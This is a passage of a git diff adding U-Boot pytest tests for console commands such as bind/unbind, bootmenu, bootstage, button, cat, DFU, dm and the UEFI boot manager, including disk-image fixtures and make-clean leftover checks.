No error expected and all devices should be there + response = u_boot_console.run_command('bind /bind-test/bind-test-child1 phy_sandbox') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, True) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, False) + + #Unbind child #2. No error expected and all devices should be there except for bind-test-child2 + response = u_boot_console.run_command('unbind /bind-test/bind-test-child2') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, True) + assert 'bind-test-child2' not in tree + + + #Bind child #2. No error expected and all devices should be there + response = u_boot_console.run_command('bind /bind-test/bind-test-child2 simple_bus') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + #Unbind parent. No error expected. All devices should be removed and unbound + response = u_boot_console.run_command('unbind /bind-test') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert 'bind-test' not in tree + assert 'bind-test-child1' not in tree + assert 'bind-test-child2' not in tree + + #try binding invalid node with valid driver + response = u_boot_console.run_command('bind /not-a-valid-node simple_bus') + assert response != '' + tree = u_boot_console.run_command('dm tree') + assert 'not-a-valid-node' not in tree + + #try binding valid node with invalid driver + response = u_boot_console.run_command('bind /bind-test not_a_driver') + assert response != '' + tree = u_boot_console.run_command('dm tree') + assert 'bind-test' not in tree + + #bind /bind-test. 
Device should come up as well as its children + response = u_boot_console.run_command('bind /bind-test simple_bus') + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test', 'simple_bus', 'simple_bus', 0, True) + assert in_tree(tree, 'bind-test-child1', 'phy', 'phy_sandbox', 1, False) + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + response = u_boot_console.run_command('unbind /bind-test') + assert response == '' + +def get_next_line(tree, name): + treelines = [x.strip() for x in tree.splitlines() if x.strip()] + child_line = '' + for idx, line in enumerate(treelines): + if '-- ' + name in line: + try: + child_line = treelines[idx+1] + except: + pass + break + return child_line + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_bind') +@pytest.mark.singlethread +def test_bind_unbind_with_uclass(u_boot_console): + #bind /bind-test + response = u_boot_console.run_command('bind /bind-test simple_bus') + assert response == '' + + #make sure bind-test-child2 is there and get its uclass/index pair + tree = u_boot_console.run_command('dm tree') + child2_line = [x.strip() for x in tree.splitlines() if '-- bind-test-child2' in x] + assert len(child2_line) == 1 + + child2_uclass = child2_line[0].split()[0] + child2_index = int(child2_line[0].split()[1]) + + #bind simple_bus as a child of bind-test-child2 + response = u_boot_console.run_command( + 'bind {} {} simple_bus'.format(child2_uclass, child2_index)) + + #check that the child is there and its uclass/index pair is right + tree = u_boot_console.run_command('dm tree') + + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line + child_of_child2_index = int(child_of_child2_line.split()[1]) + assert in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True) + assert child_of_child2_index == child2_index + 1 + + #unbind the child and check it has been removed + response = u_boot_console.run_command('unbind simple_bus {}'.format(child_of_child2_index)) + assert response == '' + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + assert not in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True) + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line == '' + + #bind simple_bus as a child of bind-test-child2 + response = u_boot_console.run_command( + 'bind {} {} simple_bus'.format(child2_uclass, child2_index)) + + #check that the child is there and its uclass/index pair is right + tree = u_boot_console.run_command('dm tree') + treelines = [x.strip() for x in tree.splitlines() if x.strip()] + + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line + child_of_child2_index = int(child_of_child2_line.split()[1]) + assert in_tree(tree, 'simple_bus', 'simple_bus', 'simple_bus', 2, True) + assert child_of_child2_index == child2_index + 1 + + #unbind the child and check it has been removed + response = u_boot_console.run_command( + 'unbind {} {} simple_bus'.format(child2_uclass, child2_index)) + assert response == '' + + tree = u_boot_console.run_command('dm tree') + assert in_tree(tree, 'bind-test-child2', 'simple_bus', 'simple_bus', 1, True) + + child_of_child2_line = get_next_line(tree, 'bind-test-child2') + assert child_of_child2_line == '' + + #unbind the child again and check it doesn't change the tree + tree_old = u_boot_console.run_command('dm 
tree') + response = u_boot_console.run_command( + 'unbind {} {} simple_bus'.format(child2_uclass, child2_index)) + tree_new = u_boot_console.run_command('dm tree') + + assert response == '' + assert tree_old == tree_new + + response = u_boot_console.run_command('unbind /bind-test') + assert response == '' diff --git a/test/py/tests/test_bootmenu.py b/test/py/tests/test_bootmenu.py new file mode 100644 index 00000000000..70f51de699f --- /dev/null +++ b/test/py/tests/test_bootmenu.py @@ -0,0 +1,46 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Test bootmenu""" + +import pytest + +@pytest.mark.buildconfigspec('cmd_bootmenu') +def test_bootmenu(u_boot_console): + """Test bootmenu + + u_boot_console -- U-Boot console + """ + + with u_boot_console.temporary_timeout(500): + u_boot_console.run_command('setenv bootmenu_default 1') + u_boot_console.run_command('setenv bootmenu_0 test 1=echo ok 1') + u_boot_console.run_command('setenv bootmenu_1 test 2=echo ok 2') + u_boot_console.run_command('setenv bootmenu_2 test 3=echo ok 3') + u_boot_console.run_command('bootmenu 2', wait_for_prompt=False) + for i in ('U-Boot Boot Menu', 'test 1', 'test 2', 'test 3', 'autoboot'): + u_boot_console.p.expect([i]) + # Press enter key to execute default entry + response = u_boot_console.run_command(cmd='\x0d', wait_for_echo=False, send_nl=False) + assert 'ok 2' in response + u_boot_console.run_command('bootmenu 2', wait_for_prompt=False) + u_boot_console.p.expect(['autoboot']) + # Press up key to select prior entry followed by the enter key + response = u_boot_console.run_command(cmd='\x1b\x5b\x41\x0d', wait_for_echo=False, + send_nl=False) + assert 'ok 1' in response + u_boot_console.run_command('bootmenu 2', wait_for_prompt=False) + u_boot_console.p.expect(['autoboot']) + # Press down key to select next entry followed by the enter key + response = u_boot_console.run_command(cmd='\x1b\x5b\x42\x0d', wait_for_echo=False, + send_nl=False) + assert 'ok 3' in response + u_boot_console.run_command('bootmenu 2; echo rc:$?', wait_for_prompt=False) + u_boot_console.p.expect(['autoboot']) + # Press the escape key + response = u_boot_console.run_command(cmd='\x1b', wait_for_echo=False, send_nl=False) + assert 'ok' not in response + assert 'rc:0' in response + u_boot_console.run_command('setenv bootmenu_default') + u_boot_console.run_command('setenv bootmenu_0') + u_boot_console.run_command('setenv bootmenu_1') + u_boot_console.run_command('setenv bootmenu_2') diff --git a/test/py/tests/test_bootstage.py b/test/py/tests/test_bootstage.py new file mode 100644 index 00000000000..a9eb9f0b4a1 --- /dev/null +++ b/test/py/tests/test_bootstage.py @@ -0,0 +1,67 @@ +# SPDX-License-Identifier: GPL-2.0 +# (C) Copyright 2023, Advanced Micro Devices, Inc. + +import pytest + +""" +Test the bootstage command. + +It is used for checking the boot progress and timing by printing the bootstage +report, stashes the data into memory and unstashes the data from memory. + +Note: This test relies on boardenv_* containing configuration values to define +the data size, memory address, and bootstage magic address (defined in +common/bootstage.c). Without this, bootstage stash and unstash tests will be +automatically skipped. 
+ +For example: +env__bootstage_cmd_file = { + 'addr': 0x200000, + 'size': 0x1000, + 'bootstage_magic_addr': 0xb00757a3, +} +""" + +@pytest.mark.buildconfigspec('bootstage') +@pytest.mark.buildconfigspec('cmd_bootstage') +def test_bootstage_report(u_boot_console): + output = u_boot_console.run_command('bootstage report') + assert 'Timer summary in microseconds' in output + assert 'Accumulated time:' in output + assert 'dm_r' in output + +@pytest.mark.buildconfigspec('bootstage') +@pytest.mark.buildconfigspec('cmd_bootstage') +@pytest.mark.buildconfigspec('bootstage_stash') +def test_bootstage_stash(u_boot_console): + f = u_boot_console.config.env.get('env__bootstage_cmd_file', None) + if not f: + pytest.skip('No bootstage environment file is defined') + + addr = f.get('addr') + size = f.get('size') + bootstage_magic = f.get('bootstage_magic_addr') + expected_text = 'dm_r' + + u_boot_console.run_command('bootstage stash %x %x' % (addr, size)) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') + + output = u_boot_console.run_command('md %x 100' % addr) + + # Check BOOTSTAGE_MAGIC address at 4th byte address + assert '0x' + output.split('\n')[0].split()[4] == hex(bootstage_magic) + + # Check expected string in last column of output + output_last_col = ''.join([i.split()[-1] for i in output.split('\n')]) + assert expected_text in output_last_col + return addr, size + +@pytest.mark.buildconfigspec('bootstage') +@pytest.mark.buildconfigspec('cmd_bootstage') +@pytest.mark.buildconfigspec('bootstage_stash') +def test_bootstage_unstash(u_boot_console): + addr, size = test_bootstage_stash(u_boot_console) + u_boot_console.run_command('bootstage unstash %x %x' % (addr, size)) + output = u_boot_console.run_command('echo $?') + assert output.endswith('0') diff --git a/test/py/tests/test_button.py b/test/py/tests/test_button.py new file mode 100644 index 00000000000..3b7f148c8fc --- /dev/null +++ b/test/py/tests/test_button.py @@ -0,0 +1,37 @@ +# SPDX-License-Identifier: GPL-2.0+ + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_button') +def test_button_list(u_boot_console): + """Test listing buttons""" + + response = u_boot_console.run_command('button list; echo rc:$?') + assert('button1' in response) + assert('button2' in response) + assert('rc:0' in response) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_button') +@pytest.mark.buildconfigspec('cmd_gpio') +def test_button_return_code(u_boot_console): + """Test correct reporting of the button status + + The sandbox gpio driver reports the last output value as input value. + We can use this in our test to emulate different input statuses. 
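+
+    (Annotation, not part of the original patch: 'gpio set a3' latches the
+    sandbox GPIO output high, so the following 'gpio input a3' reads that
+    value back and 'button button1' reports 'on' with exit code 0, while
+    'gpio clear a3' makes it report 'off' with exit code 1.)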
+ """ + + u_boot_console.run_command('gpio set a3; gpio input a3'); + response = u_boot_console.run_command('button button1; echo rc:$?') + assert('on' in response) + assert('rc:0' in response) + + u_boot_console.run_command('gpio clear a3; gpio input a3'); + response = u_boot_console.run_command('button button1; echo rc:$?') + assert('off' in response) + assert('rc:1' in response) + + response = u_boot_console.run_command('button nonexistent-button; echo rc:$?') + assert('not found' in response) + assert('rc:1' in response) diff --git a/test/py/tests/test_cat/conftest.py b/test/py/tests/test_cat/conftest.py new file mode 100644 index 00000000000..320e7ebd295 --- /dev/null +++ b/test/py/tests/test_cat/conftest.py @@ -0,0 +1,36 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for cat command test +""" + +import os +import shutil +from subprocess import check_call, CalledProcessError +import pytest + +@pytest.fixture(scope='session') +def cat_data(u_boot_config): + """Set up a file system to be used in cat tests + + Args: + u_boot_config -- U-Boot configuration. + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_cat' + image_path = u_boot_config.persistent_data_dir + '/cat.img' + + try: + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/hello', 'w', encoding = 'ascii') as file: + file.write('hello world\n') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + yield image_path + except CalledProcessError: + pytest.skip('Setup failed') + finally: + shutil.rmtree(mnt_point) + if os.path.exists(image_path): + os.remove(image_path) diff --git a/test/py/tests/test_cat/test_cat.py b/test/py/tests/test_cat/test_cat.py new file mode 100644 index 00000000000..132527bd4c2 --- /dev/null +++ b/test/py/tests/test_cat/test_cat.py @@ -0,0 +1,20 @@ +# SPDX-License-Identifier: GPL-2.0+ + +""" Unit test for cat command +""" + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_cat') +def test_cat(u_boot_console, cat_data): + """ Unit test for cat + + Args: + u_boot_console -- U-Boot console + cat_data -- Path to the disk image used for testing. 
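+
+    (Annotation, not part of the original patch: cat_data is the GPT/vfat
+    image built by the conftest.py fixture above; its only file, /hello,
+    contains "hello world", which the test binds to host device 0 and
+    reads back with 'cat host 0 hello'.)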
+ """ + response = u_boot_console.run_command_list([ + f'host bind 0 {cat_data}', + 'cat host 0 hello']) + assert 'hello world' in response diff --git a/test/py/tests/test_cleanup_build.py b/test/py/tests/test_cleanup_build.py new file mode 100644 index 00000000000..aca90cb1107 --- /dev/null +++ b/test/py/tests/test_cleanup_build.py @@ -0,0 +1,110 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2023 Tobias Deiminger <tdmg@linutronix.de> + +"""Test for unexpected leftovers after make clean""" + +import itertools +import os +import pathlib +import shutil +import sys + +import pytest + +# pylint: disable=redefined-outer-name + + +@pytest.fixture +def tmp_copy_of_builddir(u_boot_config, tmp_path): + """For each test, provide a temporary copy of the initial build directory.""" + if os.path.realpath(u_boot_config.source_dir) == os.path.realpath( + u_boot_config.build_dir + ): + pytest.skip("Leftover detection requires out of tree build.") + return None + shutil.copytree( + u_boot_config.build_dir, + tmp_path, + symlinks=True, + dirs_exist_ok=True, + ) + return tmp_path + + +@pytest.fixture(scope="module") +def run_make(u_boot_log): + """Provide function to run and log make without connecting to u-boot console.""" + runner = u_boot_log.get_runner("make", sys.stdout) + + def _run_make(build_dir, target): + cmd = ["make", f"O={build_dir}", target] + runner.run(cmd) + + yield _run_make + runner.close() + + +@pytest.fixture(scope="module") +def most_generated_files(): + """Path.glob style patterns to describe what should be removed by 'make clean'.""" + return ( + "**/*.c", + "**/*.dtb", + "**/*.dtbo", + "**/*.o", + "**/*.py", + "**/*.pyc", + "**/*.so", + "**/*.srec", + "u-boot*", + "[svt]pl/u-boot*", + ) + + +@pytest.fixture(scope="module") +def all_generated_files(most_generated_files): + """Path.glob style patterns to describe what should be removed by 'make mrproper'.""" + return most_generated_files + (".config", "**/*.h") + + +def find_files(search_dir, include_patterns, exclude_dirs=None): + """Find files matching include_patterns, unless it's in one of exclude_dirs. 
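+
+    Illustrative call (not part of the original patch):
+        find_files(build_dir, ("**/*.o", "u-boot*"), exclude_dirs=["scripts"])
+    would return the paths, relative to build_dir, of any object files or
+    u-boot* artifacts left outside scripts/ after a clean.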
+ + include_patterns -- Path.glob style pattern relative to search dir + exclude_dir -- directories to exclude, expected relative to search dir + """ + matches = [] + exclude_dirs = [] if exclude_dirs is None else exclude_dirs + for abs_path in itertools.chain.from_iterable( + pathlib.Path(search_dir).glob(pattern) for pattern in include_patterns + ): + if abs_path.is_dir(): + continue + rel_path = pathlib.Path(os.path.relpath(abs_path, search_dir)) + if not any( + rel_path.is_relative_to(exclude_dir) for exclude_dir in exclude_dirs + ): + matches.append(rel_path) + return matches + + +def test_clean(run_make, tmp_copy_of_builddir, most_generated_files): + """Test if 'make clean' deletes most generated files.""" + run_make(tmp_copy_of_builddir, "clean") + leftovers = find_files( + tmp_copy_of_builddir, + most_generated_files, + exclude_dirs=["scripts", "test/overlay"], + ) + assert not leftovers, f"leftovers: {', '.join(map(str, leftovers))}" + + +def test_mrproper(run_make, tmp_copy_of_builddir, all_generated_files): + """Test if 'make mrproper' deletes current configuration and all generated files.""" + run_make(tmp_copy_of_builddir, "mrproper") + leftovers = find_files( + tmp_copy_of_builddir, + all_generated_files, + exclude_dirs=["test/overlay"], + ) + assert not leftovers, f"leftovers: {', '.join(map(str, leftovers))}" diff --git a/test/py/tests/test_dfu.py b/test/py/tests/test_dfu.py new file mode 100644 index 00000000000..5d87eb349bf --- /dev/null +++ b/test/py/tests/test_dfu.py @@ -0,0 +1,320 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. + +# Test U-Boot's "dfu" command. The test starts DFU in U-Boot, waits for USB +# device enumeration on the host, executes dfu-util multiple times to test +# various transfer sizes, many of which trigger USB driver edge cases, and +# finally aborts the "dfu" command in U-Boot. + +import os +import os.path +import pytest +import u_boot_utils + +""" +Note: This test relies on: + +a) boardenv_* to contain configuration values to define which USB ports are +available for testing. Without this, this test will be automatically skipped. +For example: + +env__usb_dev_ports = ( + { + 'fixture_id': 'micro_b', + 'tgt_usb_ctlr': '0', + 'host_usb_dev_node': '/dev/usbdev-p2371-2180', + # This parameter is optional /if/ you only have a single board + # attached to your host at a time. + 'host_usb_port_path': '3-13', + }, +) + +# Optional entries (required only when 'alt_id_test_file' and +# 'alt_id_dummy_file' are specified). +test_file_name = '/dfu_test.bin' +dummy_file_name = '/dfu_dummy.bin' +# Above files are used to generate proper 'alt_info' entry +'alt_info': '/%s ext4 0 2;/%s ext4 0 2' % (test_file_name, dummy_file_name), + +env__dfu_configs = ( + # eMMC, partition 1 + { + 'fixture_id': 'emmc', + 'alt_info': '/dfu_test.bin ext4 0 1;/dfu_dummy.bin ext4 0 1', + 'cmd_params': 'mmc 0', + # This value is optional. + # If present, it specified the set of transfer sizes tested. + # If missing, a default list of sizes will be used, which covers + # various useful corner cases. + # Manually specifying test sizes is useful if you wish to test 4 DFU + # configurations, but don't want to test every single transfer size + # on each, to avoid bloating the overall time taken by testing. + 'test_sizes': (63, 64, 65), + # This value is optional. + # The name of the environment variable that the the dfu command reads + # alt info from. 
If unspecified, this defaults to dfu_alt_info, which is + # valid for most systems. Some systems use a different variable name. + # One example is the Odroid XU3, which automatically generates + # $dfu_alt_info, each time the dfu command is run, by concatenating + # $dfu_alt_boot and $dfu_alt_system. + 'alt_info_env_name': 'dfu_alt_system', + # This value is optional. + # For boards which require the 'test file' alt setting number other than + # default (0) it is possible to specify exact file name to be used as + # this parameter. + 'alt_id_test_file': test_file_name, + # This value is optional. + # For boards which require the 'dummy file' alt setting number other + # than default (1) it is possible to specify exact file name to be used + # as this parameter. + 'alt_id_dummy_file': dummy_file_name, + }, +) + +b) udev rules to set permissions on devices nodes, so that sudo is not +required. For example: + +ACTION=="add", SUBSYSTEM=="block", SUBSYSTEMS=="usb", KERNELS=="3-13", MODE:="666" + +(You may wish to change the group ID instead of setting the permissions wide +open. All that matters is that the user ID running the test can access the +device.) + +c) An optional udev rule to give you a persistent value to use in +host_usb_dev_node. For example: + +IMPORT{builtin}="path_id" +ENV{ID_PATH}=="?*", ENV{.ID_PORT}=="", SYMLINK+="bus/usb/by-path/$env{ID_PATH}" +ENV{ID_PATH}=="?*", ENV{.ID_PORT}=="?*", SYMLINK+="bus/usb/by-path/$env{ID_PATH}-port$env{.ID_PORT}" +""" + +# The set of file sizes to test. These values trigger various edge-cases such +# as one less than, equal to, and one greater than typical USB max packet +# sizes, and similar boundary conditions. +test_sizes_default = ( + 64 - 1, + 64, + 64 + 1, + 128 - 1, + 128, + 128 + 1, + 960 - 1, + 960, + 960 + 1, + 4096 - 1, + 4096, + 4096 + 1, + 1024 * 1024 - 1, + 1024 * 1024, + 8 * 1024 * 1024, +) + +first_usb_dev_port = None + +@pytest.mark.buildconfigspec('cmd_dfu') +@pytest.mark.requiredtool('dfu-util') +def test_dfu(u_boot_console, env__usb_dev_port, env__dfu_config): + """Test the "dfu" command; the host system must be able to enumerate a USB + device when "dfu" is running, various DFU transfers are tested, and the + USB device must disappear when "dfu" is aborted. + + Args: + u_boot_console: A U-Boot console connection. + env__usb_dev_port: The single USB device-mode port specification on + which to run the test. See the file-level comment above for + details of the format. + env__dfu_config: The single DFU (memory region) configuration on which + to run the test. See the file-level comment above for details + of the format. + + Returns: + Nothing. + """ + + def start_dfu(): + """Start U-Boot's dfu shell command. + + This also waits for the host-side USB enumeration process to complete. + + Args: + None. + + Returns: + Nothing. 
+ """ + + u_boot_utils.wait_until_file_open_fails( + env__usb_dev_port['host_usb_dev_node'], True) + fh = u_boot_utils.attempt_to_open_file( + env__usb_dev_port['host_usb_dev_node']) + if fh: + fh.close() + raise Exception('USB device present before dfu command invoked') + + u_boot_console.log.action( + 'Starting long-running U-Boot dfu shell command') + + dfu_alt_info_env = env__dfu_config.get('alt_info_env_name', \ + 'dfu_alt_info') + + cmd = 'setenv "%s" "%s"' % (dfu_alt_info_env, + env__dfu_config['alt_info']) + u_boot_console.run_command(cmd) + + cmd = 'dfu 0 ' + env__dfu_config['cmd_params'] + u_boot_console.run_command(cmd, wait_for_prompt=False) + u_boot_console.log.action('Waiting for DFU USB device to appear') + fh = u_boot_utils.wait_until_open_succeeds( + env__usb_dev_port['host_usb_dev_node']) + fh.close() + + def stop_dfu(ignore_errors): + """Stop U-Boot's dfu shell command from executing. + + This also waits for the host-side USB de-enumeration process to + complete. + + Args: + ignore_errors: Ignore any errors. This is useful if an error has + already been detected, and the code is performing best-effort + cleanup. In this case, we do not want to mask the original + error by "honoring" any new errors. + + Returns: + Nothing. + """ + + try: + u_boot_console.log.action( + 'Stopping long-running U-Boot dfu shell command') + u_boot_console.ctrlc() + u_boot_console.log.action( + 'Waiting for DFU USB device to disappear') + u_boot_utils.wait_until_file_open_fails( + env__usb_dev_port['host_usb_dev_node'], ignore_errors) + except: + if not ignore_errors: + raise + + def run_dfu_util(alt_setting, fn, up_dn_load_arg): + """Invoke dfu-util on the host. + + Args: + alt_setting: The DFU "alternate setting" identifier to interact + with. + fn: The host-side file name to transfer. + up_dn_load_arg: '-U' or '-D' depending on whether a DFU upload or + download operation should be performed. + + Returns: + Nothing. + """ + + cmd = ['dfu-util', '-a', alt_setting, up_dn_load_arg, fn] + if 'host_usb_port_path' in env__usb_dev_port: + cmd += ['-p', env__usb_dev_port['host_usb_port_path']] + u_boot_utils.run_and_log(u_boot_console, cmd) + u_boot_console.wait_for('Ctrl+C to exit ...') + + def dfu_write(alt_setting, fn): + """Write a file to the target board using DFU. + + Args: + alt_setting: The DFU "alternate setting" identifier to interact + with. + fn: The host-side file name to transfer. + + Returns: + Nothing. + """ + + run_dfu_util(alt_setting, fn, '-D') + + def dfu_read(alt_setting, fn): + """Read a file from the target board using DFU. + + Args: + alt_setting: The DFU "alternate setting" identifier to interact + with. + fn: The host-side file name to transfer. + + Returns: + Nothing. + """ + + # dfu-util fails reads/uploads if the host file already exists + if os.path.exists(fn): + os.remove(fn) + run_dfu_util(alt_setting, fn, '-U') + + def dfu_write_read_check(size): + """Test DFU transfers of a specific size of data + + This function first writes data to the board then reads it back and + compares the written and read back data. Measures are taken to avoid + certain types of false positives. + + Args: + size: The data size to test. + + Returns: + Nothing. 
+ """ + + test_f = u_boot_utils.PersistentRandomFile(u_boot_console, + 'dfu_%d.bin' % size, size) + readback_fn = u_boot_console.config.result_dir + '/dfu_readback.bin' + + u_boot_console.log.action('Writing test data to DFU primary ' + + 'altsetting') + dfu_write(alt_setting_test_file, test_f.abs_fn) + + u_boot_console.log.action('Writing dummy data to DFU secondary ' + + 'altsetting to clear DFU buffers') + dfu_write(alt_setting_dummy_file, dummy_f.abs_fn) + + u_boot_console.log.action('Reading DFU primary altsetting for ' + + 'comparison') + dfu_read(alt_setting_test_file, readback_fn) + + u_boot_console.log.action('Comparing written and read data') + written_hash = test_f.content_hash + read_back_hash = u_boot_utils.md5sum_file(readback_fn, size) + assert(written_hash == read_back_hash) + + # This test may be executed against multiple USB ports. The test takes a + # long time, so we don't want to do the whole thing each time. Instead, + # execute the full test on the first USB port, and perform a very limited + # test on other ports. In the limited case, we solely validate that the + # host PC can enumerate the U-Boot USB device. + global first_usb_dev_port + if not first_usb_dev_port: + first_usb_dev_port = env__usb_dev_port + if env__usb_dev_port == first_usb_dev_port: + sizes = env__dfu_config.get('test_sizes', test_sizes_default) + else: + sizes = [] + + dummy_f = u_boot_utils.PersistentRandomFile(u_boot_console, + 'dfu_dummy.bin', 1024) + + alt_setting_test_file = env__dfu_config.get('alt_id_test_file', '0') + alt_setting_dummy_file = env__dfu_config.get('alt_id_dummy_file', '1') + + ignore_cleanup_errors = True + try: + start_dfu() + + u_boot_console.log.action( + 'Overwriting DFU primary altsetting with dummy data') + dfu_write(alt_setting_test_file, dummy_f.abs_fn) + + for size in sizes: + with u_boot_console.log.section('Data size %d' % size): + dfu_write_read_check(size) + # Make the status of each sub-test obvious. If the test didn't + # pass, an exception was thrown so this code isn't executed. + u_boot_console.log.status_pass('OK') + ignore_cleanup_errors = False + finally: + stop_dfu(ignore_cleanup_errors) diff --git a/test/py/tests/test_dm.py b/test/py/tests/test_dm.py new file mode 100644 index 00000000000..68d4ea12235 --- /dev/null +++ b/test/py/tests/test_dm.py @@ -0,0 +1,81 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (C) 2020 Sean Anderson + +import pytest + +@pytest.mark.buildconfigspec('cmd_dm') +def test_dm_compat(u_boot_console): + """Test that each driver in `dm tree` is also listed in `dm compat`.""" + response = u_boot_console.run_command('dm tree') + driver_index = response.find('Driver') + assert driver_index != -1 + drivers = (line[driver_index:].split()[0] + for line in response[:-1].split('\n')[2:]) + + response = u_boot_console.run_command('dm compat') + for driver in drivers: + assert driver in response + + # check sorting - output looks something like this: + # testacpi 0 [ ] testacpi_drv |-- acpi-test + # testacpi 1 [ ] testacpi_drv | `-- child + # pci_emul_p 1 [ ] pci_emul_parent_drv |-- pci-emul2 + # pci_emul 5 [ ] sandbox_swap_case_em | `-- emul2@1f,0 + + # The number of '| ' and '--' matches indicate the indent level. We start + # checking sorting only after UCLASS_AXI_EMUL after which the names should + # be sorted. 
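+    # Annotation (not part of the original patch): for the sample line
+    #   pci_emul   5  [   ]   sandbox_swap_case_em   |   `-- emul2@1f,0
+    # the indent computed below is line.count('| ') + ('--' in line)
+    # = 1 + 1 = 2, i.e. the device sits two levels below the tree root.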
+ + response = u_boot_console.run_command('dm tree -s') + lines = response.split('\n')[2:] + stack = [] # holds where we were up to at the previous indent level + prev = '' # uclass name of previous line + start = False + for line in lines: + indent = line.count('| ') + ('--' in line) + cur = line.split()[0] + if not start: + if cur != 'axi_emul': + continue + start = True + + # Handle going up or down an indent level + if indent > len(stack): + stack.append(prev) + prev = '' + elif indent < len(stack): + prev = stack.pop() + + # Check that the current uclass name is not alphabetically before the + # previous one + if 'emul' not in cur and cur < prev: + print('indent', cur >= prev, indent, prev, cur, stack) + assert cur >= prev + prev = cur + + +@pytest.mark.buildconfigspec('cmd_dm') +def test_dm_drivers(u_boot_console): + """Test that each driver in `dm compat` is also listed in `dm drivers`.""" + response = u_boot_console.run_command('dm compat') + drivers = (line[:20].rstrip() for line in response[:-1].split('\n')[2:]) + response = u_boot_console.run_command('dm drivers') + for driver in drivers: + assert driver in response + +@pytest.mark.buildconfigspec('cmd_dm') +def test_dm_static(u_boot_console): + """Test that each driver in `dm static` is also listed in `dm drivers`.""" + response = u_boot_console.run_command('dm static') + drivers = (line[:25].rstrip() for line in response[:-1].split('\n')[2:]) + response = u_boot_console.run_command('dm drivers') + for driver in drivers: + assert driver in response + +@pytest.mark.buildconfigspec("cmd_dm") +def test_dm_uclass(u_boot_console): + response = u_boot_console.run_command("dm uclass") + +@pytest.mark.buildconfigspec("cmd_dm") +def test_dm_devres(u_boot_console): + response = u_boot_console.run_command("dm devres") diff --git a/test/py/tests/test_efi_bootmgr/conftest.py b/test/py/tests/test_efi_bootmgr/conftest.py new file mode 100644 index 00000000000..0eca025058e --- /dev/null +++ b/test/py/tests/test_efi_bootmgr/conftest.py @@ -0,0 +1,38 @@ +# SPDX-License-Identifier: GPL-2.0+ + +"""Fixture for UEFI bootmanager test.""" + +import os +import shutil +from subprocess import check_call +import pytest + +@pytest.fixture(scope='session') +def efi_bootmgr_data(u_boot_config): + """Set up a file system to be used in UEFI bootmanager tests. + + Args: + u_boot_config -- U-Boot configuration. 
+ + Return: + A path to disk image to be used for testing + """ + mnt_point = u_boot_config.persistent_data_dir + '/test_efi_bootmgr' + image_path = u_boot_config.persistent_data_dir + '/efi_bootmgr.img' + + shutil.rmtree(mnt_point, ignore_errors=True) + os.mkdir(mnt_point, mode = 0o755) + + with open(mnt_point + '/initrd-1.img', 'w', encoding = 'ascii') as file: + file.write("initrd 1") + + with open(mnt_point + '/initrd-2.img', 'w', encoding = 'ascii') as file: + file.write("initrd 2") + + shutil.copyfile(u_boot_config.build_dir + '/lib/efi_loader/initrddump.efi', + mnt_point + '/initrddump.efi') + + check_call(f'virt-make-fs --partition=gpt --size=+1M --type=vfat {mnt_point} {image_path}', + shell=True) + + return image_path diff --git a/test/py/tests/test_efi_bootmgr/test_efi_bootmgr.py b/test/py/tests/test_efi_bootmgr/test_efi_bootmgr.py new file mode 100644 index 00000000000..1bb59d8fcf8 --- /dev/null +++ b/test/py/tests/test_efi_bootmgr/test_efi_bootmgr.py @@ -0,0 +1,44 @@ +# SPDX-License-Identifier: GPL-2.0+ +""" Unit test for UEFI bootmanager +""" + +import pytest + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_bootefi_bootmgr') +@pytest.mark.singlethread +def test_efi_bootmgr(u_boot_console, efi_bootmgr_data): + """ Unit test for UEFI bootmanager + The efidebug command is used to set up UEFI load options. + The bootefi bootmgr loads initrddump.efi as a payload. + The crc32 of the loaded initrd.img is checked + + Args: + u_boot_console -- U-Boot console + efi_bootmgr_data -- Path to the disk image used for testing. + """ + u_boot_console.run_command(cmd = f'host bind 0 {efi_bootmgr_data}') + + u_boot_console.run_command(cmd = 'efidebug boot add ' \ + '-b 0001 label-1 host 0:1 initrddump.efi ' \ + '-i host 0:1 initrd-1.img -s nocolor') + u_boot_console.run_command(cmd = 'efidebug boot dump') + u_boot_console.run_command(cmd = 'efidebug boot order 0001') + u_boot_console.run_command(cmd = 'bootefi bootmgr') + response = 